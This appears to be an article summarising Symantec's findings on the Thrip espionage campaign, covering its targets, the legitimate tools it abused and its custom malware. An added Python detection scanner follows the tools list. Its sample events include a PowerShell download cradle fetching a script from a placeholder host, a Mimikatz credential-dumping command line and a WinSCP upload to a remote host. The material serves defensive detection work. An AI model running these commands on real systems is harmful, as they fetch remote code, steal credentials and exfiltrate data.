The attackers used a combination of custom malware and legitimate system tools to hide their activity and reduce the risk of discovery.
Security researchers from Symantec uncovered the re-emerged Thrip campaign: “We identified three computers in China being used to launch the Thrip attacks. Thrip’s motive is likely espionage and its targets include those in the communications, geospatial imaging, and defense sectors, both in the United States and Southeast Asia.”
In the latest campaign the attackers changed their tactics, using a mixture of custom malware and legitimate or open source tools. The custom malware is designed to steal information from an infected computer, including login credentials.
Thrip Hacker Group Targets
Thrip targets include communications, geospatial imaging, and defense sectors, both in the United States and Southeast Asia.
The group goes after the operational units of the organisations it targets: in one intrusion it looked to deploy malware on computers used to monitor and control satellites.
Another target was an organisation involved in geospatial imaging and mapping. Here too the attackers went after the operational side, targeting computers running MapXtreme GIS (Geographic Information System) software.
In a further set of attacks they targeted three different telecoms operators based in Southeast Asia, and in every one of these intrusions the operational side of the business was the focus.
Tools and Custom malware
According to Symantec, the Thrip Hacker Group switched to a mixture of custom malware and legitimate tools in this most recent wave of attacks, which dates from 2017.
Legitimate tools abused by Thrip Hacker Group
PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool was primarily used by the attackers to move laterally on the victim’s network.
PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance.
Mimikatz: Freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext.
WinSCP: Open source SFTP/FTP client used to exfiltrate data from targeted organizations.
LogMeIn: Cloud-based remote access software. It’s unclear whether the attackers gained unauthorized access to the victims’ LogMeIn accounts or whether they created their own.
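The following is an added detection example, not code from Symantec’s report or from this article. It is a small Python scanner over constructed Sysmon Event ID 1 (process creation) records that flags the tool abuse listed above: PsExec on both ends of a lateral move, PowerShell download cradles including base64-encoded ones, Mimikatz module syntax regardless of the binary’s name, and WinSCP scripted transfers to a remote host. The rule names, sample events and addresses are assumptions made for illustration.

```python
"""Flag process-creation events matching living-off-the-land tool abuse.
Added example: rules and sample events are constructed for illustration
and are not Symantec's indicators."""
import base64
import binascii
import re
from typing import Dict, List, Optional

# PowerShell's -EncodedCommand takes base64 of UTF-16LE text and accepts any
# unambiguous prefix of the switch name (-e, -ec, -enc, ...), hence the loose match.
ENCODED_SWITCH_RE = re.compile(r"(?i)[-/]e[a-z]*\s+([A-Za-z0-9+/=]{16,})")
CRADLE_RE = re.compile(
    r"(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest"
    r"|\biwr\b|Start-BitsTransfer|Invoke-Expression|\biex\b)")
# Mimikatz module syntax for the capabilities named above: privilege::debug
# (privileges), crypto:: (certificate export), sekurlsa::/lsadump:: (credentials).
MIMIKATZ_RE = re.compile(r"(?i)(privilege::debug|sekurlsa::|lsadump::|crypto::|kerberos::)")
REMOTE_TRANSFER_RE = re.compile(r"(?i)\b(sftp|ftps?|scp)://")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent/undecodable."""
    m = ENCODED_SWITCH_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the rule names matched by one Sysmon Event ID 1 record."""
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    findings: List[str] = []
    if image in ("psexec.exe", "psexec64.exe"):
        findings.append("psexec-client")          # operator side of a lateral move
    if image == "psexesvc.exe" and parent == "services.exe":
        findings.append("psexec-service")         # target side: the service PsExec drops
    if image in ("powershell.exe", "pwsh.exe"):
        text = cmd
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("powershell-encoded")
            text = f"{cmd} {decoded}"             # inspect the decoded script, not only the wrapper
        if CRADLE_RE.search(text):
            findings.append("powershell-download-cradle")
    if MIMIKATZ_RE.search(cmd):
        findings.append("mimikatz-module")        # a renamed binary still exposes module syntax
    if image == "winscp.exe" and REMOTE_TRANSFER_RE.search(cmd):
        findings.append("winscp-transfer")        # scripted transfer to a remote host: exfil candidate
    return findings


def scan(events: List[Dict[str, str]]):
    """Return (index, findings) for every event that matched at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := analyze_event(ev))]


# Constructed sample events (not real telemetry); addresses are documentation ranges.
CRADLE_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/p.ps1')"
ENCODED = base64.b64encode(CRADLE_CMD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "CommandLine": "svchost.exe -k netsvcs",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Tools\PsExec.exe", "CommandLine": r"PsExec.exe \\10.0.0.12 -u CORP\admin cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\PSEXESVC.exe", "CommandLine": r"C:\Windows\PSEXESVC.exe",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\ops\AppData\Local\Temp\m.exe",
     "CommandLine": 'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Program Files\WinSCP\WinSCP.exe",
     "CommandLine": 'WinSCP.exe /command "open sftp://user@203.0.113.5/" "put C:\\staging\\docs.7z"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["Image"], hits)
```

The PSEXESVC rule deliberately requires services.exe as the parent, because the legitimate PsExec service is started by the Service Control Manager; a PSEXESVC.exe launched from anywhere else is a different question and would need its own rule. Decoding the encoded command before matching matters because an attacker who wraps the cradle in -EncodedCommand otherwise defeats every keyword rule.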
Custom malware used by Thrip Hacker Group
Trojan.Rikamanu: A custom Trojan designed to steal information from an infected computer, including credentials and system information.
Infostealer.Catchamas: Based on Rikamanu, this malware contains additional features designed to avoid detection. It also includes a number of new capabilities, such as the ability to capture information from newer applications (such as new or updated web browsers) that have emerged since the original Trojan.Rikamanu malware was created.
Trojan.Mycicil: A keylogger known to have been created by underground Chinese hackers. Although publicly available, it is not frequently seen.
Backdoor.Spedear: Although not seen in this recent wave of attacks, Spedear is a backdoor Trojan that has been used by Thrip in other campaigns.
Trojan.Syndicasec: Another Trojan used by Thrip in previous campaigns.
Symantec published an analysis report along with the IOCs associated with the campaign.